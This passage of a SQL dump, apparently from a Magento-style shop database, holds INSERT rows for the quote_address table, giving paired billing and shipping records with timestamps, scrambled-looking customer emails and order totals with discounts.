(399, 381, '2024-01-27 10:55:02', '2024-01-27 10:55:02', 91, 0, NULL, 'billing', 'EsxqRJ.bqbqhd@chiffon.fun', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(400, 381, '2024-01-27 10:55:02', '2024-01-27 10:55:02', 91, 0, NULL, 'shipping', 'EsxqRJ.bqbqhd@chiffon.fun', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(401, 382, '2024-02-02 05:46:57', '2024-02-02 05:46:57', 92, 0, NULL, 'billing', 'bVSxDv.dcwmqb@sabletree.foundation', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(402, 382, '2024-02-02 05:46:57', '2024-02-02 05:46:57', 92, 0, NULL, 'shipping', 'bVSxDv.dcwmqb@sabletree.foundation', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(403, 383, '2024-02-02 08:44:49', '2024-02-02 08:44:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(404, 383, '2024-02-02 08:44:49', '2024-02-02 08:44:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(405, 384, '2024-02-03 05:47:56', '2024-02-03 05:47:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(406, 384, '2024-02-03 05:47:56', '2024-02-03 05:47:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(407, 385, '2024-02-03 13:15:09', '2024-02-03 13:15:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(408, 385, '2024-02-03 13:15:09', '2024-02-03 13:15:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(409, 386, '2024-02-05 02:48:05', '2024-02-05 02:48:05', 93, 0, NULL, 'billing', 'ubAqze.mdtqpm@chiffon.fun', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(410, 386, '2024-02-05 02:48:05', '2024-02-05 02:48:05', 93, 0, NULL, 'shipping', 'ubAqze.mdtqpm@chiffon.fun', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(411, 387, '2024-02-16 23:27:59', '2024-02-16 23:27:59', 94, 0, NULL, 'billing', 'HqTfja.ttdqjhq@flexduck.click', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(412, 387, '2024-02-16 23:28:00', '2024-02-16 23:28:00', 94, 0, NULL, 'shipping', 'HqTfja.ttdqjhq@flexduck.click', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(413, 388, '2024-02-24 22:49:52', '2024-02-24 22:49:52', 95, 0, NULL, 'billing', 'BhKWfr.pwbctjc@rushlight.cfd', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(414, 388, '2024-02-24 22:49:52', '2024-02-24 22:49:52', 95, 0, NULL, 'shipping', 'BhKWfr.pwbctjc@rushlight.cfd', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(415, 389, '2024-02-28 04:29:23', '2024-02-28 04:29:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(416, 389, '2024-02-28 04:29:23', '2024-02-28 04:29:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(417, 390, '2024-03-06 08:37:31', '2024-03-06 08:37:31', 96, 0, NULL, 'billing', 'VPVPVF.pmqjmbd@kerfuffle.asia', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(418, 390, '2024-03-06 08:37:31', '2024-03-06 08:37:31', 96, 0, NULL, 'shipping', 'VPVPVF.pmqjmbd@kerfuffle.asia', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(419, 391, '2024-03-12 15:33:50', '2024-03-12 15:33:50', 97, 0, NULL, 'billing', 'yawDKK.phtptc@sabletree.foundation', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(420, 391, '2024-03-12 15:33:50', '2024-03-12 15:33:50', 97, 0, NULL, 'shipping', 'yawDKK.phtptc@sabletree.foundation', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(421, 392, '2024-03-20 12:13:18', '2024-03-20 12:13:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(422, 392, '2024-03-20 12:13:18', '2024-03-20 12:13:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(423, 393, '2024-03-21 12:09:50', '2024-03-21 12:09:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(424, 393, '2024-03-21 12:09:50', '2024-03-21 12:09:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(425, 394, '2024-03-24 16:47:59', '2024-03-24 16:47:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(426, 394, '2024-03-24 16:47:59', '2024-03-24 16:47:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(427, 395, '2024-03-28 08:27:20', '2024-03-28 08:27:20', 98, 0, NULL, 'billing', 'qdjwjbdbhd.hq@monochord.xyz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(428, 395, '2024-03-28 08:27:20', '2024-03-28 08:27:20', 98, 0, NULL, 'shipping', 'qdjwjbdbhd.hq@monochord.xyz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(429, 396, '2024-03-31 03:15:53', '2024-03-31 03:15:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(430, 396, '2024-03-31 03:15:53', '2024-03-31 03:15:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(431, 397, '2024-04-19 02:11:20', '2024-04-19 02:11:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(432, 397, '2024-04-19 02:11:20', '2024-04-19 02:11:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(433, 398, '2024-04-19 09:52:41', '2024-04-19 09:52:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(434, 398, '2024-04-19 09:52:41', '2024-04-19 09:52:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(435, 399, '2024-04-26 14:35:22', '2024-04-26 14:35:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(436, 399, '2024-04-26 14:35:22', '2024-04-26 14:35:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.6000, -128.6000, 514.4000, 514.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(437, 400, '2024-05-02 14:19:52', '2024-05-02 14:19:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(438, 400, '2024-05-02 14:19:52', '2024-05-02 14:19:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(439, 401, '2024-05-04 04:53:41', '2024-05-04 04:53:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(440, 401, '2024-05-04 04:53:41', '2024-05-04 04:53:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(441, 402, '2024-05-21 09:03:34', '2024-05-21 09:03:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(442, 402, '2024-05-21 09:03:34', '2024-05-21 09:03:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
